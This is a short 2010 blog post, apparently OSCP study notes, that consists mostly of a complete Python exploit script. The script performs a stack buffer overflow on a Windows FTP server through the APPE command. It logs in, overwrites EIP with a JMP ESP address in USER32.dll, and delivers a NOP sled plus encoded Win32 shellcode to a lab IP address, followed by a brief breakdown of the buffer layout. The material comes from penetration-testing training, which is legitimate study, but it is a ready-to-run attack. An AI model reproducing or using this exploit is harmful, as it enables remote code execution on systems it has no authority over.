Matteo Michelini

Saturday, October 09, 2010

OSCP: shellcode in Win32

---------------------
#!/usr/bin/python

import socket

buffer = 'A' * 2000

shellcode=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"
"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"
"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"
"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"
"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"
"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"
"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"
"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"
"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"
"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"
"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"
"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"
"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"
"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"
"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"
"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"
"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"
"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"
"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"
"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"
"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")

# 77D8AF0A
buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654

print 'Sending evil buffer....'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.11.113',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
---------------------

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 10 + shellcode

'\x41' * 966 to get EIP
overwrite EIP with JMP ESP from USER32.dll
'\x43' * 16 to get ESP
add some NOPs
put the shellcode

posted by Matteo at 9:00 PM

0 Comments:

Post a Comment

<< Home